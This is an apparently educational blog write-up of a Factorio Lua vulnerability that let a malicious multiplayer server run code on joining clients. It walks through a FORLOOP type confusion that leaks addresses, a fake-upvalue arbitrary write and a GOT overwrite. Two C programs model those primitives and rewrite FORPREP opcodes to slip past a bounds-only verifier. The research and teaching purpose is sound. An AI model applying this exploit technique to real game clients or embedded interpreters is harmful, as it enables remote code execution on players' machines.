Factorio Lua Vulnerability: Insights and Exploits Explained

By Mark Howell, 29 June 2024, 4 min read

This article examines a critical vulnerability in Factorio's embedded Lua interpreter that let a malicious multiplayer server execute arbitrary code on the clients that joined it. Factorio had sold over 3.5 million copies, so the exposed user base was large. The aim is to use Lua as a model for a whole class of dynamic-language vulnerabilities; an interactive challenge at the end lets you practise the concepts.

Factorio and Lua Integration

(Image: Factorio game interface)

What is Factorio?

Factorio is a factory-building game in which the player automates production until a rocket can be launched and the planet left behind. With millions of copies sold and an active modding community, it is an attractive target for security research.

How is Lua Used?

Lua scripts drive Factorio's game logic, mods and custom maps, which is what makes the modding community possible. At first sight the risk looks confined to mods a player chooses to install locally. The multiplayer mode widens it considerably: the game keeps all participants in deterministic lockstep, so Lua that runs as part of the shared game state runs on every connected client. A server that supplies malicious Lua therefore executes it on each player that joins, turning a local scripting bug into remote code execution.

General Exploitation Path

The general path for attacking a Lua interpreter from the network has three steps:

  1. Identify a point of entry: a way for attacker-supplied Lua to reach the victim's interpreter (in Factorio, the multiplayer session).

  2. Survey the exposed Lua modules: the standard libraries that talk to the host (os and io in stock Lua, for instance) are the dangerous ones and are usually stripped from a sandbox. What remains decides whether the next step is needed.

  3. Use bytecode: Lua's load() accepts precompiled bytecode as well as source, and the VM executes bytecode directly, without re-checking the invariants the compiler normally guarantees. Hand-crafted bytecode is the lever for breaking the language's own type safety.

Bytecode Verifier and Exploitation

Bytecode Verifier

Lua 5.1 shipped with a bytecode verifier meant to reject malicious chunks. It was removed in Lua 5.2 after repeated bypasses showed it could not be made sound, and the reference manual has warned since then that maliciously crafted binary chunks can crash the interpreter. Factorio added a verifier of its own that mainly checks that register, constant and jump indices stay in bounds, but it had off-by-one errors, and bounds checking alone says nothing about whether consecutive instructions agree on the type of a register.

Exploitation Path

Combining type confusion with the raw control that bytecode gives over the VM, the chain is:

  • Leak memory: a type confusion inside a numeric for loop reads an object's pointer back as a number.

  • Create fake objects: with addresses known, corrupt an upvalue pointer so that the closure treats attacker-chosen bytes as a Lua object.

  • Write arbitrary memory: a fake upvalue whose pointer targets any address turns an ordinary assignment into an arbitrary write, which is enough to hijack execution.

Practical Exploitation in Factorio

Leaking Addresses

Addresses leak through type confusion:

  • Every Lua value is a TValue: a type tag next to an 8-byte union that holds either a double or a pointer to a collectable object. The bytes look the same in both cases; only the tag, and the opcode handler that honours it, tells them apart.

  • Numeric for loops: FORPREP checks that the start, limit and step registers hold numbers. FORLOOP, which the compiler only ever emits after a FORPREP, does its arithmetic on the raw union without checking. Bytecode that skips or patches FORPREP and reaches FORLOOP with a table or function in the start register gets that object's address back as a double in the loop variable.

Fetching Fake Objects

Control over a closure's upvalues is what yields fake Lua objects:

  • Each upvalue is a small structure whose pointer says where the value lives. Redirect that pointer, or point the closure at an attacker-built upvalue structure, and GETUPVAL returns whatever bytes sit at the chosen address as a Lua value. Filling those bytes with a crafted object header produces a fake object that the VM treats as real.
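The two primitives described above, the address leak through FORLOOP and the write through a redirected upvalue, as an added example in C. This is not code from the original article, from Factorio, or from the Lua source: it models the Lua 5.2 TValue and UpVal layouts (lobject.h) and the FORPREP, FORLOOP and SETUPVAL handlers (lvm.c) in just enough detail to show the confusion; the scenario functions, their names, and the choice of step 0 and limit -1 are this example's own assumptions.

```c
/* toy_lvm.c: C model of Lua 5.2's TValue/UpVal layouts (lobject.h) and of the
 * FORPREP, FORLOOP and SETUPVAL handlers (lvm.c), reduced to what the type
 * confusion needs. Added illustration for this page, not Lua or Factorio code;
 * the scenario functions are this example's own. Build: cc -std=c11 -Wall toy_lvm.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { LUA_TNIL = 0, LUA_TNUMBER = 3, LUA_TTABLE = 5 };

typedef struct GCObject { struct GCObject *next; uint8_t tt; uint8_t marked; } GCObject;

/* A TValue is 8 value bytes plus a tag saying how to read them; the union
 * enforces nothing, only the opcode handlers consult tt_. */
typedef union Value { GCObject *gc; void *p; double n; int b; } Value;
typedef struct TValue { Value value_; int tt_; } TValue;

/* An upvalue: v points at the TValue the closure reads and writes through. */
typedef struct UpVal { GCObject *next; uint8_t tt; uint8_t marked; TValue *v; TValue value; } UpVal;

static void setnvalue(TValue *o, double x) { o->value_.n = x; o->tt_ = LUA_TNUMBER; }

/* OP_FORPREP: the only place the three loop registers are type-checked. */
int vm_forprep(TValue *ra, const char **err)
{
    if (ra[1].tt_ != LUA_TNUMBER) { *err = "'for' limit must be a number"; return 0; }
    if (ra[2].tt_ != LUA_TNUMBER) { *err = "'for' step must be a number"; return 0; }
    if (ra[0].tt_ != LUA_TNUMBER) { *err = "'for' initial value must be a number"; return 0; }
    setnvalue(&ra[0], ra[0].value_.n - ra[2].value_.n);
    *err = NULL; return 1;
}

/* OP_FORLOOP: trusts FORPREP and reads value_.n of every register with no tag
 * check. Returns 1 when the loop continues; ra[3] is the loop variable. */
int vm_forloop(TValue *ra)
{
    double step = ra[2].value_.n, idx = ra[0].value_.n + step, limit = ra[1].value_.n;
    if (0 < step ? idx <= limit : limit <= idx) {
        setnvalue(&ra[0], idx);
        setnvalue(&ra[3], idx);
        return 1;
    }
    return 0;
}

/* OP_SETUPVAL: copy the 8 value bytes and the tag to wherever uv->v points. */
void vm_setupval(UpVal *uv, const TValue *ra) { uv->v->value_ = ra->value_; uv->v->tt_ = ra->tt_; }

/* Checked path: FORPREP refuses a table as the loop's initial value. */
int forprep_rejects_table(void)
{
    GCObject t = {0}; TValue ra[4]; const char *err = NULL;
    memset(ra, 0, sizeof ra);
    ra[0].value_.gc = &t; ra[0].tt_ = LUA_TTABLE;
    setnvalue(&ra[1], 10.0); setnvalue(&ra[2], 1.0);
    return vm_forprep(ra, &err) == 0 && err != NULL;
}

/* Unchecked path: bytecode that skips FORPREP and runs FORLOOP with a table in
 * the start register. Step 0.0 keeps the pointer bits intact (any x86-64
 * user-space address is a subnormal double), limit -1 satisfies limit <= idx,
 * and the bits land in ra[3] as a plain number. Real bytecode then breaks out. */
uintptr_t leak_via_forloop(GCObject *obj)
{
    TValue ra[4]; uint64_t bits;
    memset(ra, 0, sizeof ra);
    ra[0].value_.gc = obj; ra[0].tt_ = LUA_TTABLE;
    setnvalue(&ra[1], -1.0); setnvalue(&ra[2], 0.0);
    if (!vm_forloop(ra)) return 0;
    memcpy(&bits, &ra[3].value_.n, sizeof bits);
    return (uintptr_t)bits;
}

int leak_roundtrip_ok(void) { GCObject t = {0}; return leak_via_forloop(&t) == (uintptr_t)&t; }

/* Arbitrary write: with the bytes of an UpVal under attacker control (a fake one
 * built inside a string, found with the leak above), pointing v at any address
 * turns SETUPVAL into a 12-byte write: 8 value bytes, then the 4-byte tag. */
void write64_via_upval(void *addr, uint64_t bits)
{
    UpVal fake; TValue src;
    memset(&fake, 0, sizeof fake);
    fake.v = (TValue *)addr;
    memcpy(&src.value_.n, &bits, sizeof bits); src.tt_ = LUA_TNUMBER;
    vm_setupval(&fake, &src);
}

/* Write into a 16-byte target (the shape of a GOT slot and its neighbour) and
 * return what landed in the first 8 bytes. */
uint64_t write_roundtrip(uint64_t bits)
{
    union { TValue tv; uint64_t raw[2]; } target;
    memset(&target, 0, sizeof target);
    write64_via_upval(&target, bits);
    return target.raw[0];
}

int main(void)
{
    printf("FORPREP rejects a table:  %d\n", forprep_rejects_table());
    printf("FORLOOP leak round-trips: %d\n", leak_roundtrip_ok());
    printf("SETUPVAL write lands:     %d\n", write_roundtrip(0x4141414141414141ULL) == 0x4141414141414141ULL);
    return 0;
}
```

The step value matters: adding a non-zero step to the subnormal double that encodes the pointer would destroy the low bits, so the bytecode sets step to 0 and relies on the loop body to break out. The write side shows why a single redirected upvalue is enough: whatever the attacker stores in the closure's upvalue lands, tag and all, at the address the fake structure names.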

Achieving Remote Code Execution (RCE) on Linux

On Linux the chain finishes in the Global Offset Table:

  • Overwrite the GOT: leak a libc function pointer from the binary's GOT to defeat ASLR, then use the arbitrary write to replace a GOT entry with the address of a function that runs a command, so the next call through that entry executes the attacker's command. This presupposes a GOT that is writable at runtime, that is, a binary not linked with full RELRO.

Key Exploitation Steps

  • Patch the bytecode: rewrite FORPREP and similar type-checking opcodes so that the unchecked opcodes that follow run on registers of the wrong type.

  • Craft string headers: build a header whose length field covers more memory than the real string, so that adjacent data can be read out through ordinary string operations.

  • Redirect upvalue pointers: change where an upvalue points so that reading and assigning that upvalue reads and writes arbitrary addresses.
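Encoding Lua 5.2 instructions and rewriting FORPREP, as an added C example that serves the "Utilizing Bytecode" step and the "Patch the bytecode" step above. This is not code from the original research or from Factorio. The field widths and opcode numbers are those of Lua 5.2's lopcodes.h (the Lua line Factorio embeds); rewriting each FORPREP into a JMP with the same target is this example's assumed form of the patch, not a description of the original exploit's exact bytes.

```c
/* luaop_patch.c: encode, decode and rewrite Lua 5.2 instructions. Added example
 * for this page, not code from the original research or Factorio. Field widths
 * and opcode numbers follow lopcodes.h (Lua 5.2); FORPREP -> JMP is this
 * example's assumption about the patch. Build: cc -std=c11 -Wall luaop_patch.c */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Layout, low bit first: op:6 | A:8 | C:9 | B:9.  Bx = B:C, sBx = Bx - MAXARG_sBx. */
enum { SIZE_OP = 6, SIZE_A = 8, SIZE_B = 9, SIZE_C = 9, SIZE_Bx = SIZE_B + SIZE_C,
       POS_OP = 0, POS_A = POS_OP + SIZE_OP, POS_C = POS_A + SIZE_A, POS_B = POS_C + SIZE_C,
       POS_Bx = POS_C, MAXARG_Bx = (1 << SIZE_Bx) - 1, MAXARG_sBx = MAXARG_Bx >> 1 };

enum { OP_MOVE, OP_LOADK, OP_LOADKX, OP_LOADBOOL, OP_LOADNIL, OP_GETUPVAL, OP_GETTABUP,
       OP_GETTABLE, OP_SETTABUP, OP_SETUPVAL, OP_SETTABLE, OP_NEWTABLE, OP_SELF, OP_ADD,
       OP_SUB, OP_MUL, OP_DIV, OP_MOD, OP_POW, OP_UNM, OP_NOT, OP_LEN, OP_CONCAT, OP_JMP,
       OP_EQ, OP_LT, OP_LE, OP_TEST, OP_TESTSET, OP_CALL, OP_TAILCALL, OP_RETURN,
       OP_FORLOOP, OP_FORPREP, OP_TFORCALL, OP_TFORLOOP, OP_SETLIST, OP_CLOSURE,
       OP_VARARG, OP_EXTRAARG, NUM_OPCODES };

static const char *const opnames[NUM_OPCODES] = {
    "MOVE", "LOADK", "LOADKX", "LOADBOOL", "LOADNIL", "GETUPVAL", "GETTABUP", "GETTABLE",
    "SETTABUP", "SETUPVAL", "SETTABLE", "NEWTABLE", "SELF", "ADD", "SUB", "MUL", "DIV",
    "MOD", "POW", "UNM", "NOT", "LEN", "CONCAT", "JMP", "EQ", "LT", "LE", "TEST", "TESTSET",
    "CALL", "TAILCALL", "RETURN", "FORLOOP", "FORPREP", "TFORCALL", "TFORLOOP", "SETLIST",
    "CLOSURE", "VARARG", "EXTRAARG" };

static uint32_t get_op(uint32_t i)  { return (i >> POS_OP) & ((1u << SIZE_OP) - 1); }
static uint32_t get_a(uint32_t i)   { return (i >> POS_A) & ((1u << SIZE_A) - 1); }
static uint32_t get_b(uint32_t i)   { return (i >> POS_B) & ((1u << SIZE_B) - 1); }
static uint32_t get_c(uint32_t i)   { return (i >> POS_C) & ((1u << SIZE_C) - 1); }
static uint32_t get_bx(uint32_t i)  { return (i >> POS_Bx) & MAXARG_Bx; }
static int32_t  get_sbx(uint32_t i) { return (int32_t)get_bx(i) - MAXARG_sBx; }

static uint32_t create_abc(uint32_t op, uint32_t a, uint32_t b, uint32_t c)
{ return (op << POS_OP) | (a << POS_A) | (b << POS_B) | (c << POS_C); }
static uint32_t create_abx(uint32_t op, uint32_t a, uint32_t bx)
{ return (op << POS_OP) | (a << POS_A) | (bx << POS_Bx); }
static uint32_t create_asbx(uint32_t op, uint32_t a, int32_t sbx)
{ return create_abx(op, a, (uint32_t)(sbx + MAXARG_sBx)); }

/* Rewrite every FORPREP into a JMP with the same sBx (A = 0: close no upvalues).
 * Jump targets and register numbers are untouched, so a verifier that only
 * checks those bounds still accepts the chunk; only the number checks are gone,
 * and the FORLOOP that follows runs on whatever the loop registers hold. */
size_t patch_forprep(uint32_t *code, size_t n)
{
    size_t patched = 0;
    for (size_t pc = 0; pc < n; pc++)
        if (get_op(code[pc]) == OP_FORPREP) {
            code[pc] = create_asbx(OP_JMP, 0, get_sbx(code[pc]));
            patched++;
        }
    return patched;
}

/* luac-style listing (1-based pc), enough to eyeball a chunk before and after. */
void disasm(const uint32_t *code, size_t n)
{
    for (size_t pc = 0; pc < n; pc++) {
        uint32_t i = code[pc], op = get_op(i);
        const char *name = op < NUM_OPCODES ? opnames[op] : "???";
        if (op == OP_JMP || op == OP_FORLOOP || op == OP_FORPREP)
            printf("%3zu  %-9s %u %d\t; to %ld\n", pc + 1, name, get_a(i), get_sbx(i),
                   (long)pc + 2 + get_sbx(i));
        else if (op == OP_LOADK)
            printf("%3zu  %-9s %u %u\n", pc + 1, name, get_a(i), get_bx(i));
        else
            printf("%3zu  %-9s %u %u %u\n", pc + 1, name, get_a(i), get_b(i), get_c(i));
    }
}

/* The six instructions luac 5.2 emits for `for i = 1, 3 do end`, hand-encoded
 * (constants 0..2 hold 1, 3, 1): FORPREP jumps to the FORLOOP, which jumps to itself. */
size_t sample_loop(uint32_t out[6])
{
    out[0] = create_abx(OP_LOADK, 0, 0);
    out[1] = create_abx(OP_LOADK, 1, 1);
    out[2] = create_abx(OP_LOADK, 2, 2);
    out[3] = create_asbx(OP_FORPREP, 0, 0);
    out[4] = create_asbx(OP_FORLOOP, 0, -1);
    out[5] = create_abc(OP_RETURN, 0, 1, 0);
    return 6;
}

/* Patch the sample and return the instruction at 0-based pc afterwards. */
uint32_t sample_after_patch(size_t pc)
{
    uint32_t code[6]; size_t n = sample_loop(code);
    patch_forprep(code, n);
    return pc < n ? code[pc] : 0;
}

int main(void)
{
    uint32_t code[6]; size_t n = sample_loop(code);
    puts("before:"); disasm(code, n);
    printf("patched %zu FORPREP\n", patch_forprep(code, n));
    puts("after:");  disasm(code, n);
    return 0;
}
```

In a real attack the three LOADK instructions would be replaced so that the start register receives the object whose address is wanted (a table, a function) rather than a number; the patch above is what lets the subsequent FORLOOP see it. Because the rewritten chunk still has every jump target and register index in range, a verifier of the kind the article attributes to Factorio has nothing to object to.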

Conclusion

Understanding Lua's bytecode and the flaws in how the VM trusts it sharpens awareness of the same class of weakness in other dynamic scripting languages. For hands-on practice, try the Escape from Alcawasm challenge and test your skills.

Three key ideas to take away for your startup:

  1. Security first: treat any scripting engine you embed as attack surface. The Factorio case shows that a sandboxed language is only as safe as its interpreter, and that every path by which untrusted code can reach the VM (here, a multiplayer server) deserves the scrutiny normally reserved for network parsers.

  2. Community engagement: Factorio's active modding community is both a strength and the route by which Lua became an attack surface. User-generated content needs a clear trust boundary and an execution model that assumes the content is hostile.

  3. Keep practising: interactive challenges and exercises like the one above are the quickest way to turn a write-up such as this into skills your team can apply.